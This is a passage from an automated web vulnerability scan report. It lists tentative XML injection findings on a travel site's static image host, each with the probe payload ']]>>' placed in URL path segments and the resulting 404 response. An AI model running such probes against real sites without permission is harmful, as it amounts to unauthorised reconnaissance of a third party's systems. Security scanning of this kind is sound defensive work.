User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:18 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.51. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/car-add-on/img-car-type-selector-OFF-new.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/car-add-on]]>>/img-car-type-selector-OFF-new.png?ver=193844 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535989
Date: Mon, 03 Oct 2011 01:02:20 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.52. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/car-add-on/img-car-type-selector-OFF-new.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/car-add-on/img-car-type-selector-OFF-new.png]]>>?ver=193844 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:22 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.53. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/core/background/208x3-grid-bg.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.54. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/core/background/208x3-grid-bg.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.55. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/core]]>>/background/208x3-grid-bg.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.56. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/core/background]]>>/208x3-grid-bg.gif?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535991
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.57. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/background/208x3-grid-bg.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/core/background/208x3-grid-bg.gif]]>>?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:13 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.58. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/core/map/img_poi.png?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:37 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.59. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/core/map/img_poi.png?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535990
Date: Mon, 03 Oct 2011 01:02:40 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.60. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/core]]>>/map/img_poi.png?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:43 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.61. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/core/map]]>>/img_poi.png?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:47 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.62. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/core/map/img_poi.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/core/map/img_poi.png]]>>?ver=-1 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:57 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.63. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/customer-care/blue_arrow_min.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/customer-care/blue_arrow_min.gif?ver=152264 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535977
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.64. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/customer-care/blue_arrow_min.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/customer-care/blue_arrow_min.gif?ver=152264 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535944
Date: Mon, 03 Oct 2011 01:02:28 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.65. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/customer-care/blue_arrow_min.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/customer-care]]>>/blue_arrow_min.gif?ver=152264 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:32 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.66. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/customer-care/blue_arrow_min.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/customer-care/blue_arrow_min.gif]]>>?ver=152264 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:34 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.67. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/global/background/sidebar-module-bottom-and-left-corner.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/global/background/sidebar-module-bottom-and-left-corner.gif?ver=169565 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
